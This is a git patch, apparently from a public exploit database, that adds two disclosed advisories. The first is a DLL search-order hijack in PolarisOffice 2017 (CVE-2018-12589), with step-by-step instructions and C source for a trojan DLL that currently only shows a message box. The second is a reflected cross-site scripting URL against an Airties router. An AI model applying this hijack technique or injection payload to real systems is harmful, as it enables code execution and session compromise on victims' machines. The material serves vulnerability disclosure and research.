From 5e6d4321612314f46899876025a3bd6e2427a61a Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 7 Jul 2018 05:01:49 +0000 Subject: [PATCH] DB: 2018-07-07 2 changes to exploits/shellcodes PolarisOffice 2017 8 - Remote Code Execution Airties AIR5444TT - Cross-Site Scripting --- exploits/windows/remote/44985.c | 119 +++++++++++++++++++++++++++++ exploits/windows/webapps/44986.txt | 17 +++++ files_exploits.csv | 2 + 3 files changed, 138 insertions(+) create mode 100644 exploits/windows/remote/44985.c create mode 100644 exploits/windows/webapps/44986.txt diff --git a/exploits/windows/remote/44985.c b/exploits/windows/remote/44985.c new file mode 100644 index 000000000..acf890d02 --- /dev/null +++ b/exploits/windows/remote/44985.c @@ -0,0 +1,119 @@ +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/POLARISOFFICE-2017-v8-REMOTE-CODE-EXECUTION.txt +[+] ISR: Apparition Security + + +Vendor: +============= +www.polarisoffice.com + + +Product: +=========== +PolarisOffice 2017 v8 + +Polaris Document Solution is an integrated solution for corporate document life cycle from document creation, use, management, security, and collaboration. + +Used by more than 70 million subscribers in 240 countries. + + +Vulnerability Type: +=================== +Remote Code Execution + + +CVE Reference: +============== +CVE-2018-12589 + + +Security Issue: +================ +Polaris Office 2017 8.1 allows attackers to execute arbitrary code via a Trojan horse "puiframeworkproresenu.dll" file +in the current working directory, due to a search order flaw vulnerability. + +1) create a 32bit DLL named "puiframeworkproresenu.dll" +2) put any .PDF or .PPTX file or whatever that is configured to open in Polaris Office in same directory as the above DLL +3) open the document (PDF etc) then BOOM our arbitrary DLL will execute on victims system. + +This can be observed as well with both the DLL and a document opened from a remote share. + + + +Exploit/POC: +============= + +#include + +/* hyp3rlinx */ + +/* +gcc -c -m32 puiframeworkproresenu.c +gcc -shared -m32 -o puiframeworkproresenu.dll puiframeworkproresenu.o +*/ + +void trojanizer(){ + MessageBox( 0, "Continue with PWNAGE?" , "philbin :)" , MB_YESNO + MB_ICONQUESTION ); +} + +BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved){ + switch(fdwReason){ + case DLL_PROCESS_ATTACH:{ + trojanizer(); + break; + } + case DLL_PROCESS_DETACH:{ + trojanizer(); + break; + } + case DLL_THREAD_ATTACH:{ + trojanizer(); + break; + } + case DLL_THREAD_DETACH:{ + trojanizer(); + break; + } + } + + return TRUE; +} + + + + +Network Access: +=============== +Remote + + + +Severity: +========= +High + + + +Disclosure Timeline: +============================= +Vendor Notification: June 14, 2018 +Vendor confirms vulnerability : June 19, 2018 +Mitre assigned CVE : June 20, 2018 +Vendor replied fix will be in July +however, update was released : June 23, 2018 +Notified vendor of impending advisory : June 23, 2018 +Vendor : "glad to hear that your problem has been solved" +June 26, 2018 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/exploits/windows/webapps/44986.txt b/exploits/windows/webapps/44986.txt new file mode 100644 index 000000000..bf6adcc5d --- /dev/null +++ b/exploits/windows/webapps/44986.txt @@ -0,0 +1,17 @@ +# Exploit Title: Airties AIR5444TT - Cross-Site Scripting +# Date: 2018-07-06 +# Exploit Author: Raif Berkay Dincel +# Vendor Homepage: airties.com +# Software [http://www.airties.com.tr/support/dcenter/] +# Version: [1.0.0.18] +# CVE-ID: CVE-2018-8738 +# Tested on: MacOS High Sierra / Linux Mint / Windows 10 + +# Vulnerable Parameter Type: GET +# Vulnerable Parameter: 192.168.2.1/top.html?page=main&productboardtype= + +# Proof of Concepts: + +192.168.2.1/top.html?page=main&productboardtype= + +http://192.168.2.1/top.html?page=main&productboardtype=%3Cscript%3Ealert(%22Raif%20Berkay%20Dincel%22);%3C/script%3E \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 9fa5c04a5..813259b06 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -16598,6 +16598,7 @@ id,file,description,date,author,type,platform,port 44941,exploits/windows/remote/44941.txt,"Foxit Reader 9.0.1.1049 - Remote Code Execution",2018-06-25,mr_me,remote,windows, 44968,exploits/windows/remote/44968.rb,"FTPShell Client 6.70 (Enterprise Edition) - Stack Buffer Overflow (Metasploit)",2018-07-02,Metasploit,remote,windows, 44969,exploits/linux/remote/44969.rb,"Nagios XI 5.2.6-5.4.12 - Chained Remote Code Execution (Metasploit)",2018-07-02,Metasploit,remote,linux,80 +44985,exploits/windows/remote/44985.c,"PolarisOffice 2017 8 - Remote Code Execution",2018-07-06,hyp3rlinx,remote,windows, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -39627,3 +39628,4 @@ id,file,description,date,author,type,platform,port 44977,exploits/php/webapps/44977.txt,"Online Trade - Information Disclosure",2018-07-04,L0RD,webapps,php, 44978,exploits/php/webapps/44978.txt,"ShopNx - Arbitrary File Upload",2018-07-04,L0RD,webapps,php, 44981,exploits/php/webapps/44981.txt,"SoftExpert Excellence Suite 2.0 - 'cddocument' SQL Injection",2018-07-05,"Seren PORSUK",webapps,php,80 +44986,exploits/windows/webapps/44986.txt,"Airties AIR5444TT - Cross-Site Scripting",2018-07-06,"Raif Berkay Dincel",webapps,windows,80